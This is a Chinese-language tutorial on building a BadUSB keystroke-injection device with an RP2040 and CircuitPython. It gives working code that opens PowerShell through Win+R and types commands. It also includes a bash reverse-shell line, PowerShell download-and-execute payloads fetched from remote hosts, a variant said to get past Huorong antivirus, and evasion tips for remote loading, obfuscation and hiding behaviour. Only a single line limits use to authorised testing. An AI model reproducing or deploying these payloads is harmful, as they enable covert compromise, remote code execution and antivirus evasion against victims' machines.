入门级badusb框架的实现
字数 1364 2025-08-22 12:22:54
BadUSB 入门级框架实现教学文档
1. BadUSB 概述
BadUSB 是一种基于 HID (Human Interface Device) 攻击的技术,通过伪装成输入设备(如键盘)在受害者电脑上执行恶意操作。其核心原理是利用 USB 设备的信任机制,模拟键盘输入快速完成攻击操作。
1.1 典型攻击场景
- 快速执行键盘操作(如打开终端、执行命令)
- 绕过传统杀毒软件的检测(因为输入行为通常不被视为威胁)
- 可用于权限提升、后门植入等操作
2. 硬件选择
2.1 推荐硬件
- RP2040 芯片:指甲盖大小,价格低廉(约10元)
- Pico Mini:基于 RP2040 的开发板,适合 BadUSB 实现
- O.MG Cable:商业化产品,伪装成数据线的 BadUSB 设备
2.2 硬件优势
- 成本低(DIY 方案仅需10元左右)
- 体积小,便于隐藏
- 支持 CircuitPython 开发环境
3. 开发环境搭建
3.1 固件选择
- CircuitPython:推荐使用,相比 MicroPython 有以下优势:
- 即插即用
- 配合 Adafruit_CircuitPython_HID 库可轻松模拟 HID 设备
- Python 语法,开发简单
3.2 必要库
usb_hid:基础 HID 功能adafruit_hid.keyboard:键盘模拟adafruit_hid.keycode:键盘按键映射
4. 核心代码实现
4.1 基础键盘模拟
import time
import usb_hid
from adafruit_hid.keyboard import Keyboard
from adafruit_hid.keycode import Keycode
# 创建键盘对象
keyboard = Keyboard(usb_hid.devices)
# 按键映射字典(完整版见下文)
key_map = {
'WINDOWS': Keycode.WINDOWS,
'GUI': Keycode.GUI,
'a': Keycode.A,
'A': (Keycode.SHIFT, Keycode.A),
# 其他按键映射...
}
# 基础按键示例
keyboard.press(Keycode.WINDOWS) # 按下Windows键
keyboard.press(Keycode.R) # 按下R键
keyboard.release_all() # 释放所有按键
4.2 完整按键映射表
key_map = {
'WINDOWS': Keycode.WINDOWS,
'GUI': Keycode.GUI,
'APP': Keycode.APPLICATION,
'MENU': Keycode.APPLICATION,
'SHIFT': Keycode.SHIFT,
'ALT': Keycode.ALT,
'CONTROL': Keycode.CONTROL,
'CTRL': Keycode.CONTROL,
'DOWNARROW': Keycode.DOWN_ARROW,
'DOWN': Keycode.DOWN_ARROW,
'LEFTARROW': Keycode.LEFT_ARROW,
'LEFT': Keycode.LEFT_ARROW,
'RIGHTARROW': Keycode.RIGHT_ARROW,
'RIGHT': Keycode.RIGHT_ARROW,
'UPARROW': Keycode.UP_ARROW,
'UP': Keycode.UP_ARROW,
'BREAK': Keycode.PAUSE,
'PAUSE': Keycode.PAUSE,
'CAPSLOCK': Keycode.CAPS_LOCK,
'DELETE': Keycode.DELETE,
'END': Keycode.END,
'ESC': Keycode.ESCAPE,
'ESCAPE': Keycode.ESCAPE,
'HOME': Keycode.HOME,
'INSERT': Keycode.INSERT,
'NUMLOCK': Keycode.KEYPAD_NUMLOCK,
'PAGEUP': Keycode.PAGE_UP,
'PAGEDOWN': Keycode.PAGE_DOWN,
'PRINTSCREEN': Keycode.PRINT_SCREEN,
'ENTER': Keycode.ENTER,
'SCROLLLOCK': Keycode.SCROLL_LOCK,
'SPACE': Keycode.SPACE,
'TAB': Keycode.TAB,
'BACKSPACE': Keycode.BACKSPACE,
'a': Keycode.A,
'b': Keycode.B,
'c': Keycode.C,
'd': Keycode.D,
'e': Keycode.E,
'f': Keycode.F,
'g': Keycode.G,
'h': Keycode.H,
'i': Keycode.I,
'j': Keycode.J,
'k': Keycode.K,
'l': Keycode.L,
'm': Keycode.M,
'n': Keycode.N,
'o': Keycode.O,
'p': Keycode.P,
'q': Keycode.Q,
'r': Keycode.R,
's': Keycode.S,
't': Keycode.T,
'u': Keycode.U,
'v': Keycode.V,
'w': Keycode.W,
'x': Keycode.X,
'y': Keycode.Y,
'z': Keycode.Z,
'A': (Keycode.SHIFT, Keycode.A),
'B': (Keycode.SHIFT, Keycode.B),
'C': (Keycode.SHIFT, Keycode.C),
'D': (Keycode.SHIFT, Keycode.D),
'E': (Keycode.SHIFT, Keycode.E),
'F': (Keycode.SHIFT, Keycode.F),
'G': (Keycode.SHIFT, Keycode.G),
'H': (Keycode.SHIFT, Keycode.H),
'I': (Keycode.SHIFT, Keycode.I),
'J': (Keycode.SHIFT, Keycode.J),
'K': (Keycode.SHIFT, Keycode.K),
'L': (Keycode.SHIFT, Keycode.L),
'M': (Keycode.SHIFT, Keycode.M),
'N': (Keycode.SHIFT, Keycode.N),
'O': (Keycode.SHIFT, Keycode.O),
'P': (Keycode.SHIFT, Keycode.P),
'Q': (Keycode.SHIFT, Keycode.Q),
'R': (Keycode.SHIFT, Keycode.R),
'S': (Keycode.SHIFT, Keycode.S),
'T': (Keycode.SHIFT, Keycode.T),
'U': (Keycode.SHIFT, Keycode.U),
'V': (Keycode.SHIFT, Keycode.V),
'W': (Keycode.SHIFT, Keycode.W),
'X': (Keycode.SHIFT, Keycode.X),
'Y': (Keycode.SHIFT, Keycode.Y),
'Z': (Keycode.SHIFT, Keycode.Z),
'0': Keycode.ZERO,
'1': Keycode.ONE,
'2': Keycode.TWO,
'3': Keycode.THREE,
'4': Keycode.FOUR,
'5': Keycode.FIVE,
'6': Keycode.SIX,
'7': Keycode.SEVEN,
'8': Keycode.EIGHT,
'9': Keycode.NINE,
' ': Keycode.SPACE,
'-': Keycode.MINUS,
'/': Keycode.FORWARD_SLASH,
'.': Keycode.PERIOD,
':': (Keycode.SHIFT, Keycode.SEMICOLON),
';': Keycode.SEMICOLON,
'\'': Keycode.QUOTE,
'"': (Keycode.SHIFT, Keycode.QUOTE),
'(': (Keycode.SHIFT, Keycode.NINE),
')': (Keycode.SHIFT, Keycode.ZERO),
'_': (Keycode.SHIFT, Keycode.MINUS),
'=': Keycode.EQUALS,
'!': (Keycode.SHIFT, Keycode.ONE),
'@': (Keycode.SHIFT, Keycode.TWO),
'#': (Keycode.SHIFT, Keycode.THREE),
'$': (Keycode.SHIFT, Keycode.FOUR),
'%': (Keycode.SHIFT, Keycode.FIVE),
'^': (Keycode.SHIFT, Keycode.SIX),
'&': (Keycode.SHIFT, Keycode.SEVEN),
'*': (Keycode.SHIFT, Keycode.EIGHT),
'+': (Keycode.SHIFT, Keycode.EQUALS),
'[': Keycode.LEFT_BRACKET,
']': Keycode.RIGHT_BRACKET,
'{': (Keycode.SHIFT, Keycode.LEFT_BRACKET),
'}': (Keycode.SHIFT, Keycode.RIGHT_BRACKET),
'\\': Keycode.BACKSLASH,
'|': (Keycode.SHIFT, Keycode.BACKSLASH),
'<': (Keycode.SHIFT, Keycode.COMMA),
'>': (Keycode.SHIFT, Keycode.PERIOD),
'?': (Keycode.SHIFT, Keycode.FORWARD_SLASH),
'"': (Keycode.SHIFT, Keycode.QUOTE)
}
4.3 基础功能实现
def main():
try:
# 延迟一秒,确保电脑识别设备
time.sleep(1)
# 打开运行窗口(Win+R)
keyboard.press(Keycode.WINDOWS)
keyboard.press(Keycode.R)
keyboard.release_all()
time.sleep(1)
# 输入powershell
for char in "powershell":
keyboard.press(key_map[char])
keyboard.release_all()
time.sleep(0.1)
# 回车执行
keyboard.press(Keycode.ENTER)
keyboard.release_all()
# 输入payload
payload = "echo HelloWorld"
for char in payload:
keyboard.press(key_map[char])
keyboard.release_all()
time.sleep(0.1)
# 回车执行
keyboard.press(Keycode.ENTER)
keyboard.release_all()
except Exception as e:
print(f"Error occurred: {e}")
keyboard.release_all()
raise
if __name__ == "__main__":
main()
5. 框架扩展
5.1 模块化设计
paylist = [] # 存储payload指令
def Rpayload():
"""从payload.txt读取指令"""
with open('payload.txt', 'r') as payload:
for line in payload:
line = line.strip()
if line == "POWERSHELL":
powershell()
elif line == "TOGGLE_INPUT":
toggleinput()
elif line[:3] == "set":
if line[:8] == "set Time":
set_time(line[9:])
# 其他指令处理...
return paylist
def main():
Rpayload()
5.2 常用功能模块
5.2.1 PowerShell 模块
def powershell():
global delay_time
try:
time.sleep(delay_time)
# Win+R
keyboard.press(Keycode.WINDOWS)
keyboard.press(Keycode.R)
keyboard.release_all()
time.sleep(delay_time)
# 输入powershell
for char in "powershell":
keyboard.press(key_map[char])
keyboard.release_all()
time.sleep(0.1)
# 回车执行
keyboard.press(Keycode.ENTER)
keyboard.release_all()
except Exception as e:
print(f"Error occurred: {e}")
keyboard.release_all()
raise
return "OK"
5.2.2 切换输入法模块
def toggleinput():
try:
keyboard.press(key_map['CTRL'])
time.sleep(1)
keyboard.press(key_map['SPACE'])
time.sleep(0.5)
keyboard.release_all()
except Exception as e:
print(f"Error occurred: {e}")
keyboard.release_all()
raise
5.2.3 Linux 模块
def linux_openshell():
"""打开Linux终端"""
# 根据不同发行版实现
pass
def linux_reshell(ip, port):
"""Linux反向shell"""
payload = f"bash -i >& /dev/tcp/{ip}/{port} 0>&1"
# 执行payload
pass
5.3 配置文件设计
payload.txt 示例:
set Time 1
POWERSHELL
TOGGLE_INPUT
ECHO HelloWorld
ECHO PASS
POWERSHELL
ECHO test
语法说明:
- 大写指令为模块调用(如 POWERSHELL)
- ECHO 后跟键盘输入内容
- set 设置参数,后跟具体数值
6. 攻击载荷示例
6.1 基础攻击载荷
POWERSHELL
TOGGLE_INPUT
ECHO powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.255.1:8029/a'))"
6.2 绕过火绒检测的载荷
火绒会拦截 -WindowStyle Hidden 操作,可使用以下方式绕过:
POWERSHELL
TOGGLE_INPUT
ECHO Start-Process -WindowStyle Hidden powershell.exe -ArgumentList '-NoProfile', '-Command', 'IEX ((new-object net.webclient).downloadstring(''http://192.168.56.1:8065/a''))'
ECHO exit
7. 免杀技巧
- 网络加载:将payload存放于远程服务器,运行时下载执行
- 闪存存储:将payload存放于设备闪存中调用
- 代码混淆:拆分敏感字符串,运行时拼接
- 行为规避:
- 避免直接使用敏感参数(如 -w hidden)
- 使用间接调用方式(如通过 Start-Process)
- 添加正常操作作为掩护
8. 扩展功能
- 键盘记录:监听并记录用户输入
- 条件触发:特定时间或特定操作后触发
- 多平台支持:Windows/Linux/macOS 多平台适配
- 持久化:实现自动持久化机制
9. 参考资源
- CircuitPython HID Keyboard and Mouse
- Adafruit_CircuitPython_HID 项目文档
- O.MG Cable 官方文档
10. 注意事项
- 本技术仅限合法授权测试使用
- 实际部署需考虑目标环境差异
- 注意按键延迟设置,不同电脑响应速度可能不同
- 测试时建议先使用无害命令验证功能
通过以上框架,可以快速实现一个功能完善的BadUSB设备,并根据实际需求进行功能扩展和定制化开发。